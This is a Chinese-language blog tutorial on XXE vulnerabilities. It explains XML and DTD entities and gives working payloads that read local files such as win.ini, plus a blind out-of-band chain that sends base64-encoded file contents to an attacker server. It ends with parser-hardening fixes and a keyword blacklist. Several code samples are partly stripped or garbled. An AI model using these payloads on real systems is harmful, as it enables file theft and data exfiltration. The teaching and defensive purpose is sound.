• XXE


    XXE 原理利用防御

    1.1 开门重点

      要点:libxml2.9.1 及以后,默认不解析外部实体。测试的时候 windows 下使用的是 php5.2(libxml Version 2.7.7 ), php5.3(libxml Version 2.7.8)。Linux 中需要将 libxml 低于 libxml2.9.1 的版本编译到 PHP 中,可以使用 phpinfo()查看 libxml 的版本信息。
    

    1.1.1 定义

      XML 用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。
    

    1.1.2 文档结构

      XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。
    

    <?xml version=”1.0” encoding="gb2312" encoding=”UTF-8”?> //xml 声明、版本、编码
    
    <!DOCTYPE root system "http://www.XXXX.com/file"[ //定义 DTD 文件,格式为:root 指定根 节点名称,system 声明要使用的外部 DTD 文件路径,后面加文件 URL,注意[]包裹。
    
    <!ELEMENT root (other)> // 元素声明,声明 xml 中包含的元素,声明中需要指定元素名 称(root、other 等)和元素类别、内容等
    
    <!ELEMENT to (#PCDATA)> // <!--定义 to 元素为”#PCDATA”类型-->
    
    <!ELEMENT generalentity "content" > //ELEMENT 标签用于声明实体,关于实体的定义如下: “实体是用于定义引用普通文本或特殊字符的快捷方式的变量”实体是在 DTD 文件中定义 的变量,xml 解析器解析 xml 文件的时候,会将被的引用替换为实体内容,实体分为:预 定义实体、普通实体、参数实体,此处定义了普通实体 generalentity,内容为 content
    
    <!ELEMENT % extendentity SYSTEM "http://www.XXXX.com/file"> //定义参数实体,格式 为:<!ELEMENT % 参数名称 参数内容>
    引用格式:%参数名称 参数实体只能在 DTD 文件中引用,内部 DTD 文件的参数引用只能出现于 DTD 标签可出现的 位置,外部 DTD 文件参数实体的引用可以出于 DTD 标签内容,比如:<!ELEMENT % "%another">
    
    %extendentity; //引用参数外部实体
    
    
    
    <!--XML 声明--> 
    <?xml version="1.0"?> 
    
    <!--文档类型定义--> 
    <!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
    <!ELEMENT note (to,from,heading,body)> <!--定义 note 元素有四个元素-->
    <!ELEMENT to (#PCDATA)> <!--定义 to 元素为”#PCDATA”类型-->
    <!ELEMENT from (#PCDATA)> <!--定义 from 元素为”#PCDATA”类型-->
    <!ELEMENT head (#PCDATA)> <!--定义 head 元素为”#PCDATA”类型-->
    <!ELEMENT body (#PCDATA)> <!--定义 body 元素为”#PCDATA”类型--> 
    ]>
    
    <!--下面为文档元素-->
    <note>
    <to>Dave</to> //调用 Dave 实体(此步骤不可缺)
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
    </note>
    

    1.1.3 DTD的基础知识

      Document Type Definition 即文档类型定义,用来为 XML 文档定义语义约束。可以嵌  入在 XML 文档中(内部声明),也可以独立的放在一个文件中(外部引用),由于其支持的数据  类型有限,无法对元素或属性的内容进行详细规范,在可读性和可扩展性方面也比不上 XML  Schema。
      参考链接: http://www.w3school.com.cn/dtd/index.asp
      首先了解下基本的 PAYLOAD 结构,然后再介绍每部分涉及的知识点,如下 PAYLOAD 开头  进行了 XML 的声明,然后使用 DTD 声明实体(这里使用了 file 协议),最后使用 XML 获取实  体的数据。
    

    基本的 PAYLOAD 结构:

    使用 DTD 实体的攻击方式 :

      DTD 引用方式(简要了解): 
            1. DTD 内部声明
                  <!DOCTYPE根元素[元素声明]>
            2. DTD 外部引用
                  <!DOCTYPE根元素名称SYSTEM "外部DTD的URI">
            3. 引用公共 DTD
                   <!DOCTYPE根元素名称PUBLIC "DTD标识名" "共用DTD的URL">
    

    示例:

    <?xml version="1.0"?>
    <!DOCTYPE configuration PUBLIC "-//mybatis.org//DTD Config
    3.0//EN"
    "http://mybatis.org/dtd/mybatis-3-config.dtd">
    ......
    
    命名方法:以!DOCTYPE 开始,configuration 是文档根元素名称;
    PUBLIC 表示是公共 DTD;-表示是非 ISO 组织;mybatis.org 表示组织;
    DTD 表示类型;Config 表示标签;3.0 是标签后附带的版本号;
    EN 表示 DTD 语言是英语;最后是 DTD 的 URL;
    

    DTD 实体声明(重点学习):

      1. 内部实体声明
            <!ENTITY 实体名称 "实体的值">
            一个实体由三部分构成:&符号, 实体名称, 分号 (;),这里&不论在 GET 还是在 POST www.oldboyedu.com 中都需要进行 URL 编码,因为是使用参数传入 xml 的,&符号会被认为是参数间的连接符号,示例:
    
    !DOCTYPE foo [<!ELEMENT foo ANY >
    <!ENTITY xxe "oldboyedu.com">]>
    <foo>&xxe;</foo>
    

      2. 外部实体声明
            <!ENTITY 实体名称 SYSTEM "URI/URL">
            外部引用可支持 http,file 等协议,不同的语言支持的协议不同,但存在一些通用 的协议,具体内容如下所示:
    

            示例:
    
    ]>

    &xxe;

      3. 参数实体声明
    
    or
      示例:
    

    %xxe;]>
    &evil;
    外部 evil.dtd 中的内容

      4. 引用公共实体
      <!ENTITY 实体名称 PUBLIC "public_ID" "URI">
    

    1.1.4 实体类别介绍

    实体主要分为一下四类
     内置实体 (Built-in entities)
     字符实体 (Character entities)
     通用实体 (General entities)
     参数实体 (Parameter entities)

      参数实体用%实体名称申明,引用时也用%实体名称; 
      其余实体直接用实体名称申明,引用时用&实体名称。 
      
      参数实体只能在 DTD 中申明,DTD 中引用; 
      其余实体只能在 DTD 中申明,可在 xml 文档中引用。
    
      举例: 
            内部实体 
            <!ENTITY 实体名称 "实体内容"> 
    
            外部实体 
            <!ENTITY 实体名称 SYSTEM "URI"> 参数实体 <!ENTITY % 实体名称 "实体内容"> 
            或者 
            <!ENTITY % 实体名称 "URI">
    
      注意:参数实体是在 DTD 中被引用的,而其余实体是在 xml 文档中被引用的。
    

    1.1.5 XXE的利用方式-DTD

      利用 xxe 漏洞可以进行拒绝服务攻击,文件读取,命令(代码)执行,SQL(XSS)注入,内 外扫描端口,入侵内网站点等,内网探测和入侵是利用 xxe 中支持的协议进行内网主机和端 口发现,可以理解是使用 xxe 进行 SSRF 的利用,基本上啥都能做了。
      一般 xxe 利用分为两大场景:有回显和无回显。有回显的情况可以直接在页面中看到 Payload 的执行结果或现象,无回显的情况又称为 blind xxe,可以使用外带数据通道提取 数据。
    
      1. 有回显情况:
            有回显的情况可以使用如下的两种方式进行 XXE 注入攻击。
    
    1.
    <!DOCTYPE foo [<!ELEMENT foo ANY > 
    <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]> 
    <foo>&xxe;</foo>
    
    2.
    <!DOCTYPE foo [<!ELEMENT foo ANY > 
    <!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" > 
    %xxe;]> 
    <foo>&evil;</foo>
    
    外部 evil.dtd 中的内容。
    <!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
    

    2. 无回显的情况:
            可以使用外带数据通道提取数据,先使用 php://filter 获取目标文件的内容, 然后将内容以 http 请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。
    
    <!DOCTYPE convert [ 
    <!ENTITY % remote SYSTEM "http://ip/test.dtd"> 
    %remote;%int;%send; 
    ]>
    

    test.dtd 的内容,内部的%号要进行实体编码成&#37 (注:编码可参考:http://www.mamicode.com/info-detail-1680849.html

    <!ENTITY % file SYSTEM "
    php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> 
    <!ENTITY % int "<!ENTITY &#37; send SYSTEM 
    'http://192.168.0.105:8080?p=%file;'>">
    
      有报错直接查看报错信息。
    

      无报错需要访问接受数据的服务器中的日志信息,可以看到经过 base64 编码过的数
      我们看到服务器端接收到了我们用 base64 编码后的敏感文件信息(编码也 是为了不破坏原本的 XML 语法),不编码会报错。
    
      整个调用过程:
            我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;,这就 是我们的利用顺序,%remote 先调用,调用后请求远程服务器上的 test.dtd ,有 点类似于将 test.dtd 包含进来,然后 %int 调用 test.dtd 中的 %file, %file 就会 去获取服务器上面的敏感文件,然后将 %file 的结果填入到 %send 以后(因为实体 的值中不能有 %, 所以将其转成 html 实体编码 &#37; ),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美 的解决了 XXE 无回显的问题。
    

    1.1.6 XXE漏洞利用及相关扩展知识

      jarvisoj 上的一道题目 API 调用 这道题的题目说明是 请设法获得目标机器/home/ctf/flag.txt中的flag值。
      进入题目 http://web.jarvisoj.com:9882/ 发现一个输入框,我们对其进行抓包
    


    这是一道 xxe 的题,怎么获取 flag?只要将 json 处改为 xml,然后提交 xml 文档即可

    1.1.7 XXE漏洞修复与防御

      PHP:
      libxml_disable_entity_loader(true);
    
      JAVA:
      DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); 
      dbf.setExpandEntityReferences(false); 
      setFeature("http://apache.org/xml/features/disallow-doctype-decl",true); 
      setFeature("http://xml.org/sax/features/external-general-entities",false) 
      setFeature("http://xml.org/sax/features/external-parameter-entities",false);
    
      Python:
            from lxml import etree 
            xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
    
      方案二:手动黑名单过滤(不推荐) 过滤关键词:<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC
    

    1.1.8 xee渗透学习参考

      参考地址:https://xz.aliyun.com/t/3357
    Songzhibin
  • 相关阅读:
    dw通过iis运行asp网站总结
    idea 连接mysql报错:Access denied for user 'root'@'localhost'(using password:YES)。
    idea 为模块添加Tomcat依赖 解决: Intelij IDEA 创建WEB项目时没有Servlet的jar包
    IntelliJ IDEA 高效率配置
    idea发布web项目在tomcat位置问题
    idea中HTML格式化时标签缩进问题
    IDEA 安装破解
    python中map()函数的用法讲解
    mac终端下svn常用命令
    SVN常用命令详解
  • 原文地址:https://www.cnblogs.com/binHome/p/13402442.html
Copyright © 2020-2023  润新知